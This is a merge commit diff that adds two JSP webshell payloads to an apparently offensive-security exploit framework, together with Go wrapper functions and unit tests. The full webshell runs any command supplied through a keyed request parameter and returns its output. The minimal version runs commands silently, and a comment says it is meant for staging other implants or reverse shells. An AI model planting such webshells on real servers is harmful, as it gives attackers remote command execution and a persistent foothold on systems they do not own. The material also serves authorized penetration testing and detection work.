Merge pull request #364 from vulncheck-oss/payload/webshell-jsp

Add simple JSP webshells

Author: j-baines

payload/webshell/jsp.go

@@ -0,0 +1,26 @@
+package webshell
+
+import (
+	_ "embed"
+	"fmt"
+)
+
+var (
+	//go:embed jsp/webshell.jsp
+	GetKeyed string
+	//go:embed jsp/webshell_min.jsp
+	GetKeyedMinimal string
+)
+
+// GetKeyed generates a JSP webshell that uses key as the basic authorization for a webshell. This
+// webshell will return all output information.
+func (jsp *JSPWebshell) GetKeyed(key string) string {
+	return fmt.Sprintf(GetKeyed, key, key)
+}
+
+// GetKeyedMinimal generates a JSP webshell that uses key for basic GET authentication. Unlike
+// GetKeyed, this payload does not return any information directly and is more useful for staging
+// other implants or reverse shell payloads.
+func (jsp *JSPWebshell) GetKeyedMinimal(key string) string {
+	return fmt.Sprintf(GetKeyedMinimal, key)
+}

payload/webshell/jsp/webshell.jsp

@@ -0,0 +1,10 @@
+<%%@ page import="java.io.*"%%>
+<%%
+if (request.getParameter("%s") != null) {
+	Process p = Runtime.getRuntime().exec(request.getParameter("%s"));
+	DataInputStream dis = new DataInputStream(p.getInputStream());
+	for (String line = dis.readLine(); line != null; line = dis.readLine()) {
+		out.println(line);
+	}
+}
+%%>

payload/webshell/jsp/webshell_min.jsp

@@ -0,0 +1 @@
+<%%Runtime.getRuntime().exec(request.getParameter("%s"));%%>

payload/webshell/webshell.go

@@ -6,7 +6,11 @@ package webshell
 type Dropper interface{}
 
 type (
+	JSPWebshell struct{}
 	PHPWebshell struct{}
 )
 
-var PHP = &PHPWebshell{}
+var (
+	PHP = &PHPWebshell{}
+	JSP = &JSPWebshell{}
+)

payload/webshell/webshell_test.go

@@ -19,3 +19,33 @@ func TestVerySmallHTTPGET(t *testing.T) {
 		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
 	}
 }
+
+func TestJSPWebshell(t *testing.T) {
+	key := "VULNCHECKWUZHERE"
+	jsp := webshell.JSP.GetKeyed(key)
+	// Look for superfluous %s
+	if strings.Contains(jsp, `%%`) {
+		t.Fatal("JSP payload is in an unexpected format")
+	}
+	if !strings.Contains(jsp, `<%@ page import="java.io.*"%>`) {
+		t.Fatal("JSP payload is in an unexpected format")
+	}
+	if !strings.Contains(jsp, `(request.getParameter("VULNCHECKWUZHERE") != null)`) {
+		t.Fatal("JSP payload is in an unexpected format")
+	}
+	if !strings.Contains(jsp, `Process p = Runtime.getRuntime().exec(request.getParameter("VULNCHECKWUZHERE"));`) {
+		t.Fatal("JSP payload is in an unexpected format")
+	}
+}
+
+func TestJSPWebshellMinimal(t *testing.T) {
+	key := "hacktheplanet"
+	jsp := webshell.JSP.GetKeyedMinimal(key)
+	// Look for superfluous %s
+	if strings.Contains(jsp, `%%`) {
+		t.Fatal("JSP payload is in an unexpected format")
+	}
+	if strings.Compare(jsp, `<%Runtime.getRuntime().exec(request.getParameter("hacktheplanet"));%>`) != 0 {
+		t.Fatal("JSP payload is in an unexpected format")
+	}
+}